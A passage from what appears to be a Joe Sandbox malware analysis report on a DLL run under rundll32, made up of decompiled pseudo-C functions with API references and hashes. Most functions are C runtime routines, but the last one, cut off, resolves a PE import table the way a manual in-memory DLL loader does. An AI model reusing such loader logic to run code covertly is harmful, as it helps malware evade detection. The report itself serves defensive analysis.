                                                                                                                                					}
                                                                                                                                					_t66 = _t48 & 0x00000002;
                                                                                                                                					if((_t48 & 0x00000002) != 0) {
                                                                                                                                						E10001AA0( &_v108, "ios_base::failbit set");
                                                                                                                                						_t58 =  &_v112;
                                                                                                                                						_v8 = 1;
                                                                                                                                						E100019A0( &_v112, _t66,  &_v112);
                                                                                                                                						_v156 = 0x10016268;
                                                                                                                                						E10006B9C( &_v156, 0x10019390);
                                                                                                                                					}
                                                                                                                                					E10001AA0( &_v40, "ios_base::eofbit set");
                                                                                                                                					_v8 = 2;
                                                                                                                                					E100019A0(_t58, _t66,  &_v44);
                                                                                                                                					_v88 = 0x10016268;
                                                                                                                                					_t34 = E10006B9C( &_v88, 0x10019390);
                                                                                                                                				}
                                                                                                                                				 *[fs:0x0] = _v12;
                                                                                                                                				return _t34;
                                                                                                                                			}


















                                                                                                                                APIs
                                                                                                                                • __CxxThrowException@8.LIBCMT ref: 10001C9F
                                                                                                                                  • Part of subcall function 10006B9C: RaiseException.KERNEL32(?,?,10007141,?,?,?,?,?,10007141,?,100191C4,1001C640,?,100010D3,00000000,00000003), ref: 10006BDE
                                                                                                                                • __CxxThrowException@8.LIBCMT ref: 10001CE2
                                                                                                                                • __CxxThrowException@8.LIBCMT ref: 10001D25
                                                                                                                                • __CxxThrowException@8.LIBCMT ref: 10001D63
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.692503191.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                • Associated: 00000006.00000002.692489525.0000000010000000.00000002.00020000.sdmp
                                                                                                                                • Associated: 00000006.00000002.692548110.0000000010016000.00000002.00020000.sdmp
                                                                                                                                • Associated: 00000006.00000002.692560187.000000001001B000.00000004.00020000.sdmp
                                                                                                                                • Associated: 00000006.00000002.692569712.000000001001F000.00000002.00020000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                • API String ID: 3476068407-1866435925
                                                                                                                                • Opcode ID: 787cc1faebcb331becc40892e4bbf07b5e958bb6efb997f4fad806d0a16b273a
                                                                                                                                • Instruction ID: 5d2ce6f1aabe269a185c86e44919a4fa2b20f430a779cec60424981602c4ec72
                                                                                                                                • Opcode Fuzzy Hash: 787cc1faebcb331becc40892e4bbf07b5e958bb6efb997f4fad806d0a16b273a
                                                                                                                                • Instruction Fuzzy Hash: 06215EB5418740AEE355CB60CC42FDAB7E4EF89384F80890DF69A87185DB79A149CB23
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                C-Code - Quality: 90%
                                                                                                                                			E10007F60(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                				intOrPtr _t48;
                                                                                                                                				intOrPtr _t57;
                                                                                                                                				void* _t58;
                                                                                                                                				void* _t61;
                                                                                                                                
                                                                                                                                				_t61 = __eflags;
                                                                                                                                				_t53 = __edx;
                                                                                                                                				_push(0x2c);
                                                                                                                                				_push(0x10019a00);
                                                                                                                                				E1000B078(__ebx, __edi, __esi);
                                                                                                                                				_t48 = __ecx;
                                                                                                                                				_t55 =  *((intOrPtr*)(_t58 + 0xc));
                                                                                                                                				_t57 =  *((intOrPtr*)(_t58 + 8));
                                                                                                                                				 *((intOrPtr*)(_t58 - 0x1c)) = __ecx;
                                                                                                                                				 *(_t58 - 0x34) =  *(_t58 - 0x34) & 0x00000000;
                                                                                                                                				 *((intOrPtr*)(_t58 - 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t58 + 0xc)) - 4));
                                                                                                                                				 *((intOrPtr*)(_t58 - 0x28)) = E10007423(_t58 - 0x3c,  *((intOrPtr*)(_t57 + 0x18)));
                                                                                                                                				 *((intOrPtr*)(_t58 - 0x2c)) =  *((intOrPtr*)(E1000C3E3(__ecx, __edx, _t55, _t61) + 0x88));
                                                                                                                                				 *((intOrPtr*)(_t58 - 0x30)) =  *((intOrPtr*)(E1000C3E3(_t48, __edx, _t55, _t61) + 0x8c));
                                                                                                                                				 *((intOrPtr*)(E1000C3E3(_t48, _t53, _t55, _t61) + 0x88)) = _t57;
                                                                                                                                				 *((intOrPtr*)(E1000C3E3(_t48, _t53, _t55, _t61) + 0x8c)) =  *((intOrPtr*)(_t58 + 0x10));
                                                                                                                                				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
                                                                                                                                				 *((intOrPtr*)(_t58 + 0x10)) = 1;
                                                                                                                                				 *(_t58 - 4) = 1;
                                                                                                                                				 *((intOrPtr*)(_t58 - 0x1c)) = E100074C8(_t55,  *((intOrPtr*)(_t58 + 0x14)), _t48,  *((intOrPtr*)(_t58 + 0x18)),  *((intOrPtr*)(_t58 + 0x1c)));
                                                                                                                                				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
                                                                                                                                				 *(_t58 - 4) = 0xfffffffe;
                                                                                                                                				 *((intOrPtr*)(_t58 + 0x10)) = 0;
                                                                                                                                				E10008086(_t48, _t53, _t55, _t57, _t61);
                                                                                                                                				return E1000B0BD( *((intOrPtr*)(_t58 - 0x1c)));
                                                                                                                                			}








                                                                                                                                APIs
                                                                                                                                • __CreateFrameInfo.LIBCMT ref: 10007F88
                                                                                                                                  • Part of subcall function 10007423: __getptd.LIBCMT ref: 10007431
                                                                                                                                  • Part of subcall function 10007423: __getptd.LIBCMT ref: 1000743F
                                                                                                                                • __getptd.LIBCMT ref: 10007F92
                                                                                                                                  • Part of subcall function 1000C3E3: __getptd_noexit.LIBCMT ref: 1000C3E6
                                                                                                                                  • Part of subcall function 1000C3E3: __amsg_exit.LIBCMT ref: 1000C3F3
                                                                                                                                • __getptd.LIBCMT ref: 10007FA0
                                                                                                                                • __getptd.LIBCMT ref: 10007FAE
                                                                                                                                • __getptd.LIBCMT ref: 10007FB9
                                                                                                                                • _CallCatchBlock2.LIBCMT ref: 10007FDF
                                                                                                                                  • Part of subcall function 100074C8: __CallSettingFrame@12.LIBCMT ref: 10007514
                                                                                                                                  • Part of subcall function 10008086: __getptd.LIBCMT ref: 10008095
                                                                                                                                  • Part of subcall function 10008086: __getptd.LIBCMT ref: 100080A3
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.692503191.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                • Associated: 00000006.00000002.692489525.0000000010000000.00000002.00020000.sdmp
                                                                                                                                • Associated: 00000006.00000002.692548110.0000000010016000.00000002.00020000.sdmp
                                                                                                                                • Associated: 00000006.00000002.692560187.000000001001B000.00000004.00020000.sdmp
                                                                                                                                • Associated: 00000006.00000002.692569712.000000001001F000.00000002.00020000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1602911419-0
                                                                                                                                • Opcode ID: d8abb42c3c29ad143a40f4adfd576839e02e6d599755f7ca258e769317ed5c19
                                                                                                                                • Instruction ID: 3582c551e006ef8332b87da498695a48188647825b81d49dd4b3c68d68ee0da3
                                                                                                                                • Opcode Fuzzy Hash: d8abb42c3c29ad143a40f4adfd576839e02e6d599755f7ca258e769317ed5c19
                                                                                                                                • Instruction Fuzzy Hash: 5711C6B5C04309DFEB40DFA4C845BAEBBB1FF04350F108069F854A7256DB79AA559F90
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                C-Code - Quality: 89%
                                                                                                                                			E1000FB43(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                				signed int _t15;
                                                                                                                                				LONG* _t21;
                                                                                                                                				long _t23;
                                                                                                                                				void* _t31;
                                                                                                                                				LONG* _t33;
                                                                                                                                				void* _t34;
                                                                                                                                				void* _t35;
                                                                                                                                
                                                                                                                                				_t35 = __eflags;
                                                                                                                                				_t29 = __edx;
                                                                                                                                				_t25 = __ebx;
                                                                                                                                				_push(0xc);
                                                                                                                                				_push(0x10019e70);
                                                                                                                                				E1000B078(__ebx, __edi, __esi);
                                                                                                                                				_t31 = E1000C3E3(__ebx, __edx, __edi, _t35);
                                                                                                                                				_t15 =  *0x1001bfd0; // 0xfffffffe
                                                                                                                                				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                                                                                                                                					E1000BA3C(_t25, 0xd);
                                                                                                                                					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                                                                                                                                					_t33 =  *(_t31 + 0x68);
                                                                                                                                					 *(_t34 - 0x1c) = _t33;
                                                                                                                                					__eflags = _t33 -  *0x1001bed8; // 0x4c41688
                                                                                                                                					if(__eflags != 0) {
                                                                                                                                						__eflags = _t33;
                                                                                                                                						if(_t33 != 0) {
                                                                                                                                							_t23 = InterlockedDecrement(_t33);
                                                                                                                                							__eflags = _t23;
                                                                                                                                							if(_t23 == 0) {
                                                                                                                                								__eflags = _t33 - 0x1001bab0;
                                                                                                                                								if(__eflags != 0) {
                                                                                                                                									_push(_t33);
                                                                                                                                									E100088C4(_t25, _t31, _t33, __eflags);
                                                                                                                                								}
                                                                                                                                							}
                                                                                                                                						}
                                                                                                                                						_t21 =  *0x1001bed8; // 0x4c41688
                                                                                                                                						 *(_t31 + 0x68) = _t21;
                                                                                                                                						_t33 =  *0x1001bed8; // 0x4c41688
                                                                                                                                						 *(_t34 - 0x1c) = _t33;
                                                                                                                                						InterlockedIncrement(_t33);
                                                                                                                                					}
                                                                                                                                					 *(_t34 - 4) = 0xfffffffe;
                                                                                                                                					E1000FBDE();
                                                                                                                                				} else {
                                                                                                                                					_t33 =  *(_t31 + 0x68);
                                                                                                                                				}
                                                                                                                                				if(_t33 == 0) {
                                                                                                                                					E1000B5DD(_t29, _t31, 0x20);
                                                                                                                                				}
                                                                                                                                				return E1000B0BD(_t33);
                                                                                                                                			}











                                                                                                                                APIs
                                                                                                                                • __getptd.LIBCMT ref: 1000FB4F
                                                                                                                                  • Part of subcall function 1000C3E3: __getptd_noexit.LIBCMT ref: 1000C3E6
                                                                                                                                  • Part of subcall function 1000C3E3: __amsg_exit.LIBCMT ref: 1000C3F3
                                                                                                                                • __amsg_exit.LIBCMT ref: 1000FB6F
                                                                                                                                • __lock.LIBCMT ref: 1000FB7F
                                                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 1000FB9C
                                                                                                                                • InterlockedIncrement.KERNEL32(04C41688), ref: 1000FBC7
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.692503191.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                • Associated: 00000006.00000002.692489525.0000000010000000.00000002.00020000.sdmp
                                                                                                                                • Associated: 00000006.00000002.692548110.0000000010016000.00000002.00020000.sdmp
                                                                                                                                • Associated: 00000006.00000002.692560187.000000001001B000.00000004.00020000.sdmp
                                                                                                                                • Associated: 00000006.00000002.692569712.000000001001F000.00000002.00020000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4271482742-0
                                                                                                                                • Opcode ID: 78a8d0a44b960d73edaae4df3d62959c672fc55dbbfea46cf7274b8bbea52d6c
                                                                                                                                • Instruction ID: 805db3216799d21ba311b977020a7a4edf2183a3f6cde0538c14fa6ac8423c3f
                                                                                                                                • Opcode Fuzzy Hash: 78a8d0a44b960d73edaae4df3d62959c672fc55dbbfea46cf7274b8bbea52d6c
                                                                                                                                • Instruction Fuzzy Hash: E401A136900B269BF711DB64CC55B5E73E0EF087D0F058059E81067A98CB74A980DFD2
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                C-Code - Quality: 41%
                                                                                                                                			E100088C4(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                				intOrPtr* _t10;
                                                                                                                                				intOrPtr _t13;
                                                                                                                                				intOrPtr _t23;
                                                                                                                                				void* _t25;
                                                                                                                                
                                                                                                                                				_push(0xc);
                                                                                                                                				_push(0x10019aa0);
                                                                                                                                				_t8 = E1000B078(__ebx, __edi, __esi);
                                                                                                                                				_t23 =  *((intOrPtr*)(_t25 + 8));
                                                                                                                                				if(_t23 == 0) {
                                                                                                                                					L9:
                                                                                                                                					return E1000B0BD(_t8);
                                                                                                                                				}
                                                                                                                                				if( *0x1001d0e8 != 3) {
                                                                                                                                					_push(_t23);
                                                                                                                                					L7:
                                                                                                                                					_t8 = HeapFree( *0x1001ce68, 0, ??);
                                                                                                                                					_t31 = _t8;
                                                                                                                                					if(_t8 == 0) {
                                                                                                                                						_t10 = E1000B02E(_t31);
                                                                                                                                						 *_t10 = E1000AFEC(GetLastError());
                                                                                                                                					}
                                                                                                                                					goto L9;
                                                                                                                                				}
                                                                                                                                				E1000BA3C(__ebx, 4);
                                                                                                                                				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
                                                                                                                                				_t13 = E1000CD72(_t23);
                                                                                                                                				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
                                                                                                                                				if(_t13 != 0) {
                                                                                                                                					_push(_t23);
                                                                                                                                					_push(_t13);
                                                                                                                                					E1000CDA2();
                                                                                                                                				}
                                                                                                                                				 *(_t25 - 4) = 0xfffffffe;
                                                                                                                                				_t8 = E1000891A();
                                                                                                                                				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
                                                                                                                                					goto L9;
                                                                                                                                				} else {
                                                                                                                                					_push( *((intOrPtr*)(_t25 + 8)));
                                                                                                                                					goto L7;
                                                                                                                                				}
                                                                                                                                			}








                                                                                                                                APIs
                                                                                                                                • __lock.LIBCMT ref: 100088E2
                                                                                                                                  • Part of subcall function 1000BA3C: __mtinitlocknum.LIBCMT ref: 1000BA52
                                                                                                                                  • Part of subcall function 1000BA3C: __amsg_exit.LIBCMT ref: 1000BA5E
                                                                                                                                  • Part of subcall function 1000BA3C: EnterCriticalSection.KERNEL32(1000C386,1000C386,?,10010532,00000004,10019EB0,0000000C,10009EA2,00000001,1000C395,00000000,00000000,00000000,?,1000C395,00000001), ref: 1000BA66
                                                                                                                                • ___sbh_find_block.LIBCMT ref: 100088ED
                                                                                                                                • ___sbh_free_block.LIBCMT ref: 100088FC
                                                                                                                                • HeapFree.KERNEL32(00000000,00000001,10019AA0,0000000C,1000BA1D,00000000,10019CA0,0000000C,1000BA57,00000001,1000C386,?,10010532,00000004,10019EB0,0000000C), ref: 1000892C
                                                                                                                                • GetLastError.KERNEL32(?,10010532,00000004,10019EB0,0000000C,10009EA2,00000001,1000C395,00000000,00000000,00000000,?,1000C395,00000001,00000214), ref: 1000893D
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.692503191.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                • Associated: 00000006.00000002.692489525.0000000010000000.00000002.00020000.sdmp
                                                                                                                                • Associated: 00000006.00000002.692548110.0000000010016000.00000002.00020000.sdmp
                                                                                                                                • Associated: 00000006.00000002.692560187.000000001001B000.00000004.00020000.sdmp
                                                                                                                                • Associated: 00000006.00000002.692569712.000000001001F000.00000002.00020000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2714421763-0
                                                                                                                                • Opcode ID: 1c8eb4afa8c8931ff63bd2bdb732b9c8326ff6739dc6c832ed7ed04e6504a4e9
                                                                                                                                • Instruction ID: 401740cd35cc9e6689fc1378af17d25d43dfe7f4e25987c4797ecc74e1b0f346
                                                                                                                                • Opcode Fuzzy Hash: 1c8eb4afa8c8931ff63bd2bdb732b9c8326ff6739dc6c832ed7ed04e6504a4e9
                                                                                                                                • Instruction Fuzzy Hash: 9201A235805326AAFB20EF709C0AB6E3AE4EF053E4F244119F444A6099CB34EB81CB56
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                C-Code - Quality: 28%
                                                                                                                                			E1000830D(void* __ebx, void* __ecx, void* __edx, intOrPtr* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                                                                                				void* __ebp;
                                                                                                                                				void* _t20;
                                                                                                                                				void* _t22;
                                                                                                                                				void* _t23;
                                                                                                                                				void* _t25;
                                                                                                                                				intOrPtr* _t26;
                                                                                                                                				void* _t27;
                                                                                                                                				void* _t28;
                                                                                                                                
                                                                                                                                				_t27 = __esi;
                                                                                                                                				_t26 = __edi;
                                                                                                                                				_t25 = __edx;
                                                                                                                                				_t23 = __ecx;
                                                                                                                                				_t22 = __ebx;
                                                                                                                                				_t30 = _a20;
                                                                                                                                				if(_a20 != 0) {
                                                                                                                                					_push(_a20);
                                                                                                                                					_push(__ebx);
                                                                                                                                					_push(__esi);
                                                                                                                                					_push(_a4);
                                                                                                                                					E1000827B(__ebx, __edi, __esi, _t30);
                                                                                                                                					_t28 = _t28 + 0x10;
                                                                                                                                				}
                                                                                                                                				_t31 = _a28;
                                                                                                                                				_push(_a4);
                                                                                                                                				if(_a28 != 0) {
                                                                                                                                					_push(_a28);
                                                                                                                                				} else {
                                                                                                                                					_push(_t27);
                                                                                                                                				}
                                                                                                                                				E1000717B(_t23);
                                                                                                                                				_push( *_t26);
                                                                                                                                				_push(_a16);
                                                                                                                                				_push(_a12);
                                                                                                                                				_push(_t27);
                                                                                                                                				E10007CE5(_t22, _t25, _t26, _t27, _t31);
                                                                                                                                				_push(0x100);
                                                                                                                                				_push(_a24);
                                                                                                                                				_push(_a16);
                                                                                                                                				 *((intOrPtr*)(_t27 + 8)) =  *((intOrPtr*)(_t26 + 4)) + 1;
                                                                                                                                				_push(_a8);
                                                                                                                                				_push(_t27);
                                                                                                                                				_push(_a4);
                                                                                                                                				_t20 = E10007F60(_t22,  *((intOrPtr*)(_t22 + 0xc)), _t25, _t26, _t27, _t31);
                                                                                                                                				if(_t20 != 0) {
                                                                                                                                					E10007142(_t20, _t27);
                                                                                                                                					return _t20;
                                                                                                                                				}
                                                                                                                                				return _t20;
                                                                                                                                			}












                                                                                                                                APIs
                                                                                                                                • ___BuildCatchObject.LIBCMT ref: 10008320
                                                                                                                                  • Part of subcall function 1000827B: ___BuildCatchObjectHelper.LIBCMT ref: 100082B1
                                                                                                                                • _UnwindNestedFrames.LIBCMT ref: 10008337
                                                                                                                                • ___FrameUnwindToState.LIBCMT ref: 10008345
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.692503191.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                • Associated: 00000006.00000002.692489525.0000000010000000.00000002.00020000.sdmp
                                                                                                                                • Associated: 00000006.00000002.692548110.0000000010016000.00000002.00020000.sdmp
                                                                                                                                • Associated: 00000006.00000002.692560187.000000001001B000.00000004.00020000.sdmp
                                                                                                                                • Associated: 00000006.00000002.692569712.000000001001F000.00000002.00020000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                                                                                                • String ID: csm
                                                                                                                                • API String ID: 2163707966-1018135373
                                                                                                                                • Opcode ID: d83d8fdc591bf5ebad8e36828610a1efa5597a14133a2e7603aaa7ae4084a27f
                                                                                                                                • Instruction ID: a58079fbc8efe559b7519203738159b5da1fe66325aa0d8746bc6bba66cd6c4f
                                                                                                                                • Opcode Fuzzy Hash: d83d8fdc591bf5ebad8e36828610a1efa5597a14133a2e7603aaa7ae4084a27f
                                                                                                                                • Instruction Fuzzy Hash: 8601E47540110ABBEF129F51CC41EEA7FAAFF583D4F104014BD5815169DB36EAB1DBA0
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                C-Code - Quality: 74%
                                                                                                                                			E10007C9C(void* __edx, void* __edi, void* __esi, intOrPtr* _a4) {
                                                                                                                                				signed int _v8;
                                                                                                                                				intOrPtr _t11;
                                                                                                                                				intOrPtr* _t15;
                                                                                                                                				intOrPtr* _t19;
                                                                                                                                				void* _t23;
                                                                                                                                
                                                                                                                                				_t25 = __edi;
                                                                                                                                				_t24 = __edx;
                                                                                                                                				_t11 =  *((intOrPtr*)( *_a4));
                                                                                                                                				if(_t11 == 0xe0434f4d) {
                                                                                                                                					__eflags =  *((intOrPtr*)(E1000C3E3(_t23, __edx, __edi, __eflags) + 0x90));
                                                                                                                                					if(__eflags > 0) {
                                                                                                                                						_t15 = E1000C3E3(_t23, __edx, __edi, __eflags) + 0x90;
                                                                                                                                						 *_t15 =  *_t15 - 1;
                                                                                                                                						__eflags =  *_t15;
                                                                                                                                					}
                                                                                                                                					goto L5;
                                                                                                                                				} else {
                                                                                                                                					_t32 = _t11 - 0xe06d7363;
                                                                                                                                					if(_t11 != 0xe06d7363) {
                                                                                                                                						L5:
                                                                                                                                						__eflags = 0;
                                                                                                                                						return 0;
                                                                                                                                					} else {
                                                                                                                                						 *(E1000C3E3(_t23, __edx, __edi, _t32) + 0x90) =  *(_t16 + 0x90) & 0x00000000;
                                                                                                                                						_push(8);
                                                                                                                                						_push(0x10019d50);
                                                                                                                                						E1000B078(_t23, __edi, __esi);
                                                                                                                                						_t19 =  *((intOrPtr*)(E1000C3E3(_t23, __edx, _t25, _t32) + 0x78));
                                                                                                                                						if(_t19 != 0) {
                                                                                                                                							_v8 = _v8 & 0x00000000;
                                                                                                                                							 *_t19();
                                                                                                                                							_v8 = 0xfffffffe;
                                                                                                                                						}
                                                                                                                                						return E1000B0BD(E10009F26(_t23, _t24, _t25));
                                                                                                                                					}
                                                                                                                                				}
                                                                                                                                			}









                                                                                                                                APIs
                                                                                                                                • __getptd.LIBCMT ref: 10007CB6
                                                                                                                                  • Part of subcall function 1000C3E3: __getptd_noexit.LIBCMT ref: 1000C3E6
                                                                                                                                  • Part of subcall function 1000C3E3: __amsg_exit.LIBCMT ref: 1000C3F3
                                                                                                                                • __getptd.LIBCMT ref: 10007CC7
                                                                                                                                • __getptd.LIBCMT ref: 10007CD5
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.692503191.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                • Associated: 00000006.00000002.692489525.0000000010000000.00000002.00020000.sdmp
                                                                                                                                • Associated: 00000006.00000002.692548110.0000000010016000.00000002.00020000.sdmp
                                                                                                                                • Associated: 00000006.00000002.692560187.000000001001B000.00000004.00020000.sdmp
                                                                                                                                • Associated: 00000006.00000002.692569712.000000001001F000.00000002.00020000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                                • String ID: MOC
                                                                                                                                • API String ID: 803148776-624257665
                                                                                                                                • Opcode ID: 533799551ab5621f90d1c8c2dd912f006ed24f99fabe8d318c7649798b605778
                                                                                                                                • Instruction ID: 748e218daad55e3622726c51059574500725c268f5a768dba96258ea37b88039
                                                                                                                                • Opcode Fuzzy Hash: 533799551ab5621f90d1c8c2dd912f006ed24f99fabe8d318c7649798b605778
                                                                                                                                • Instruction Fuzzy Hash: 1AE0BF3991030C8FF750DB65C086F5837E4FB49394F1941A6E44CC72A7DB38F9509A92
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                C-Code - Quality: 98%
                                                                                                                                			E100041A0(signed int _a4) {
                                                                                                                                				void* _v4;
                                                                                                                                				intOrPtr _v8;
                                                                                                                                				intOrPtr* _t45;
                                                                                                                                				intOrPtr _t48;
                                                                                                                                				intOrPtr _t53;
                                                                                                                                				void _t57;
                                                                                                                                				signed int _t58;
                                                                                                                                				void* _t60;
                                                                                                                                				signed int _t63;
                                                                                                                                				intOrPtr _t69;
                                                                                                                                				void* _t87;
                                                                                                                                				signed int* _t91;
                                                                                                                                				intOrPtr* _t93;
                                                                                                                                				intOrPtr _t94;
                                                                                                                                				signed int* _t95;
                                                                                                                                				void* _t97;
                                                                                                                                				void* _t98;
                                                                                                                                
                                                                                                                                				_t97 =  &_v8;
                                                                                                                                				_t93 = _a4;
                                                                                                                                				_t94 =  *((intOrPtr*)(_t93 + 4));
                                                                                                                                				_t45 =  *_t93 - 0xffffff80;
                                                                                                                                				_v8 = _t94;
                                                                                                                                				_a4 = 1;
                                                                                                                                				if( *((intOrPtr*)(_t45 + 4)) != 0) {
                                                                                                                                					_t87 =  *_t45 + _t94;
                                                                                                                                					_v4 = _t87;
                                                                                                                                					if(IsBadReadPtr(_t87, 0x14) != 0) {
                                                                                                                                						L21:
                                                                                                                                						return _a4;
                                                                                                                                					} else {
                                                                                                                                						while(1) {
                                                                                                                                							_t48 =  *((intOrPtr*)(_t87 + 0xc));
                                                                                                                                							if(_t48 == 0) {
                                                                                                                                								break;
                                                                                                                                							}
                                                                                                                                							_t69 =  *((intOrPtr*)( *((intOrPtr*)(_t93 + 0x1c))))(_t48 + _t94,  *((intOrPtr*)(_t93 + 0x28)));
                                                                                                                                							_t98 = _t97 + 8;
                                                                                                                                							if(_t69 == 0) {
                                                                                                                                								SetLastError(0x7e);
                                                                                                                                								_a4 = 0;
                                                                                                                                								return _a4;
                                                                                                                                							} else {
                                                                                                                                								_t53 = E10003CE0( *((intOrPtr*)(_t93 + 8)), 4 +  *(_t93 + 0xc) * 4);
                                                                                                                                								_t97 = _t98 + 8;
                                                                                                                                								if(_t53 == 0) {
                                                                                                                                									 *((intOrPtr*)( *((intOrPtr*)(_t93 + 0x24))))(_t69,  *((intOrPtr*)(_t93 + 0x28)));
                                                                                                                                									SetLastError(0xe);
                                                                                                                                									_a4 = 0;
                                                                                                                                									return _a4;
                                                                                                                                								} else {
                                                                                                                                									 *((intOrPtr*)(_t93 + 8)) = _t53;
                                                                                                                                									 *((intOrPtr*)(_t53 +  *(_t93 + 0xc) * 4)) = _t69;
                                                                                                                                									 *(_t93 + 0xc) =  *(_t93 + 0xc) + 1;
                                                                                                                                									_t57 =  *_t87;
                                                                                                                                									if(_t57 == 0) {
                                                                                                                                										_t95 = _t94 +  *((intOrPtr*)(_t87 + 0x10));
                                                                                                                                										_t91 = _t95;
                                                                                                                                									} else {
                                                                                                                                										_t95 = _t94 + _t57;
                                                                                                                                										_t91 =  *((intOrPtr*)(_t87 + 0x10)) + _v8;
                                                                                                                                									}
                                                                                                                                									_t58 =  *_t95;
                                                                                                                                									if(_t58 == 0) {
                                                                                                                                										L17:
                                                                                                                                										_t60 = _v4 + 0x14;
                                                                                                                                										_v4 = _t60;
                                                                                                                                										if(IsBadReadPtr(_t60, 0x14) != 0) {
                                                                                                                                											break;
                                                                                                                                										} else {
                                                                                                                                											_t94 = _v8;
                                                                                                                                											_t87 = _v4;
                                                                                                                                											continue;
                                                                                                                                										}
                                                                                                                                									} else {
                                                                                                                                										while(1) {
                                                                                                                                											_push( *((intOrPtr*)(_t93 + 0x28)));
                                                                                                                                											if(_t58 >= 0) {
                                                                                                                                												_t63 =  *((intOrPtr*)( *((intOrPtr*)(_t93 + 0x20))))(_t69, _t58 + _v8 + 2);
                                                                                                                                											} else {
                                                                                                                                												_t63 =  *((intOrPtr*)( *((intOrPtr*)(_t93 + 0x20))))(_t69, _t58 & 0x0000ffff);
                                                                                                                                											}
                                                                                                                                											_t97 = _t97 + 0xc;
                                                                                                                                											 *_t91 = _t63;
                                                                                                                                											if(_t63 == 0) {
                                                                                                                                												break;
                                                                                                                                											}
                                                                                                                                											_t58 = _a4;
                                                                                                                                											_t91 =  &(_t91[1]);
                                                                                                                                											if(_t58 != 0) {
                                                                                                                                												continue;
                                                                                                                                											} else {
                                                                                                                                												goto L17;
                                                                                                                                											}
                                                                                                                                											goto L24;
                                                                                                                                										}
                                                                                                                                										_a4 = 0;
                                                                                                                                										 *((intOrPtr*)( *((intOrPtr*)(_t93 + 0x24))))(_t69,  *((intOrPtr*)(_t93 + 0x28)));
                                                                                                                                										SetLastError(0x7f);
                                                                                                                                										break;
                                                                                                                                									}
                                                                                                                                								}
                                                                                                                                							}
                                                                                                                                							goto L24;
                                                                                                                                						}
                                                                                                                                						goto L21;
                                                                                                                                					}
                                                                                                                                				} else {
                                                                                                                                					return 1;
                                                                                                                                				}
                                                                                                                                				L24:
                                                                                                                                			}





















                                                                                                                                APIs
                                                                                                                                • IsBadReadPtr.KERNEL32(?,00000014,?), ref: 100041DC
                                                                                                                                • IsBadReadPtr.KERNEL32(?,00000014,?,?,00000000,00000000,?,00000000), ref: 100042A9
